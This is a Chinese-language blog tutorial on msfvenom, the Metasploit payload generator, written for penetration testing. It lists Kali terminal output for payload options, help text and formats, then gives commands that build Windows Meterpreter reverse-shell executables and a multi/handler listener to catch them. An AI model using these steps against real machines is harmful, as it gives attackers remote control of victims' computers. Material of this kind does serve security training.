简单易懂!MSFVENOM的使用指南
最编程
2024-08-04 15:06:38
...
MSFVENOM使用步骤
概述
MSFvenom是Msfpayload和Msfencode的组合,可以生成各种攻击载荷,并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上,而msfvenom可以快速创建符合靶机的载荷,Msfvenom 包含标准的命令行选项。可以为许多平台生成有效负载,如Android,Windows,Unix,Nodejs,Cisco等等。
使用步骤
-
┌──(root????kali)-[~] └─# msfvenom -l payloads | grep windows
基于目标主机的架构类型,用该命令查看并选择合适的载荷类型
-
┌──(root????kali)-[~] └─# msfvenom -p windows/meterpreter_reverse_tcp --list-options 130 ⨯ Options for payload/windows/meterpreter_reverse_tcp: ========================= Name: Windows Meterpreter Shell, Reverse TCP Inline Module: payload/windows/meterpreter_reverse_tcp Platform: Windows Arch: x86 Needs Admin: No Total size: 175174 Rank: Normal Provided by: OJ Reeves sf <stephen_fewer@harmonysecurity.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) EXTENSIONS no Comma-separate list of extensions to load EXTINIT no Initialization strings for extensions LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Description: Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer. Advanced options for payload/windows/meterpreter_reverse_tcp: ========================= Name Current Setting Required Description ---- --------------- -------- ----------- AutoLoadStdapi true yes Automatically load the Stdapi extension AutoRunScript no A script to run automatically on session creation. AutoSystemInfo true yes Automatically capture system information on initialization. AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) PayloadProcessCommandLine no The displayed command line that will be used by the payload PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs PingbackRetries 0 yes How many additional successful pingbacks PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks PrependMigrate false yes Spawns and runs shellcode in new process PrependMigrateProc no Process to spawn and run shellcode in ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST ReverseListenerBindAddress no The specific IP address to bind to on the local system ReverseListenerBindPort no The port to bind to on the local system if different from LPORT ReverseListenerComm no The specific communication channel to use for this listener ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure SessionRetryWait 10 no Number of seconds to wait between reconnect attempts StagerRetryCount 10 no The number of times the stager should retry if the first connect fails StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts VERBOSE false no Enable detailed status messages WORKSPACE no Specify the workspace for this module Evasion options for payload/windows/meterpreter_reverse_tcp: ========================= Name Current Setting Required Description ---- --------------- -------- -----------
用上述命令查看对于具体的某载荷(payload)需要设置哪些选项?
-
┌──(root????kali)-[~] └─# msfvenom --help MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] <var=val> Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe Options: -l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all -p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom --list-options List --payload <value>'s standard, advanced and evasion options -f, --format <format> Output format (use --list formats to list) -e, --encoder <encoder> The encoder to use (use --list encoders to list) --service-name <value> The service name to use when generating a service binary --sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string --smallest Generate the smallest possible payload using all available encoders --encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list) --encrypt-key <value> A key to be used for --encrypt --encrypt-iv <value> An initialization vector for --encrypt -a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list) --platform <platform> The platform for --payload (use --list platforms to list) -o, --out <path> Save the payload to a file -b, --bad-chars <list> Characters to avoid example: '\x00\xff' -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload --pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length) -s, --space <length> The maximum size of the resulting payload --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value) -i, --iterations <count> The number of times to encode the payload -c, --add-code <path> Specify an additional win32 shellcode file to include -x, --template <path> Specify a custom executable file to use as a template -k, --keep Preserve the --template behaviour and inject the payload as a new thread -v, --var-name <value> Specify a custom variable name to use for certain output formats -t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable) -h, --help Show this message
一般设置的选项除了payload里面要求的之外,其他比如format -f, 以及输出路径-o
看支持哪些文件类型:
┌──(root????kali)-[~]
└─# msfvenom --list formats 130 ⨯
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
python-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format <value>]
==============================================
Name
----
base32
base64
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript
一些例子:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.xxx lport=xxxx -f exe > / root/Desktop/reverse_tcp.exe
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.xxx lport=443 -f exe > /root/Desktop/443.exe
此时在攻击机如Kali linux启用msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.xxx
set lport 443
exploit